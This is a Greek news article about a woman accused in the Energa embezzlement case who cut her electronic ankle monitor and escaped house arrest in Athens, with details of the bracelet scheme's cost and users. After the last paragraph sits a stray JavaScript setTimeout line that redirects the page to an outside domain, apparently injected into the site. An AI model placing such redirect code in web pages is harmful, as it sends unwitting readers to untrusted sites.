Πρώτη απόδραση κρατουμένου με βραχιολάκι- Άφαντη 43χρονη

0
10

 

Μία 43χρονη είναι η πρώτη από τους κρατούμενους με ειδικό βραχιολάκι που καταφέρνει να αποδράσει.

Κατηγορείται, από κοινού με άλλα 18 άτομα, για εμπλοκή σε μεγάλη υπεξαίρεση και κατάχρηση σε βάρος του Δημοσίου -και συγκεκριμένα για την υπόθεση των εταιρειών παρόχων ηλεκτρικού ρεύματος Energa και Hellas PowerEnerga-, λαθρεμπόριο και ξέπλυμα χρήματος. Με βούλευμα του Συμβουλίου Εφετών Αθηνών, βρισκόταν σε κατ’ οίκον περιορισμό και επιτήρηση με βραχιολάκι, μέτρο που μόλις την περασμένη Παρασκευή ανανενώθηκε για άλλους έξι μήνες.

Ωστόσο, όπως έγινε γνωστό από την Αστυνομία, στις 18:58 του Σαββάτου, η εταιρεία που έχει αναλάβει την παρακολούθηση των κρατουμένων με βραχιολάκι έλαβε σήμα από τον πομπό της 43χρονης ότι βγήκε από το σπίτι της στην Ομόνοια, παραβιάζοντας τον κατ’ οίκον περιορισμό.

Αμέσως κινήθηκε συνεργείο της εταιρείας στην περιοχή, παρακολούθησε το σήμα, αλλά ο πομπός σταμάτησε να εκπέμπει 11 λεπτά αργότερα και συγκεκριμένα στις 19:09 στη γωνία Θεσσαλονίκης και Λαχανά στη Νέα Φιλαδέλφεια.

Οι υπάλληλοι της ιδιωτικής εταιρείας που έφτασαν στο σημείο βρήκαν το βραχιολάκι κομμένο, αλλά η γυναίκα είχε γίνει άφαντη και αναζητείται.

Αμέσως ειδοποιήθηκε το σύστημα της Αστυνομίας, ώστε να μη μπορέσει να διαφύγει στο εξωτερικό.

Η πιλοτική εφαρμογή του ηλεκτρονικού βραχιολιού ξεκίνησε το Μάιο του ΄15 με στόχο να εφαρμοστεί αρχικά σε 250 κρατούμενους.

Σήμερα, στην Ελλάδα άλλοι τέσσερις κρατούμενοι κάνουν χρήση του μέτρου που κοστίζει 3.000 ευρώ το κάθε βραχιόλι και ο φυλακισμένος υποχρεώνεται να καλύπτει το καθημερινό κόστος χρήσης του που ανέρχεται σε 12,5 ευρώ ημερησίως.

Πρόκειται για άλλο ένα πρώην στέλεχος της εταιρείας ΕΝΕRGA, έναν άνδρα στη Θεσσαλονίκη και δύο νεαρούς φοιτητές.

Ο ένας από τους δύο είναι ο Νίκος Ρωμανός, καταδικασμένος για συμμετοχή στη ληστεία υποκαταστήματος τράπεζας στο Βελβεντό Κοζάνης, ο οποίος παρακολουθεί τα μαθήματα της σχολής του στα ΤΕΙ της Αθήνας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here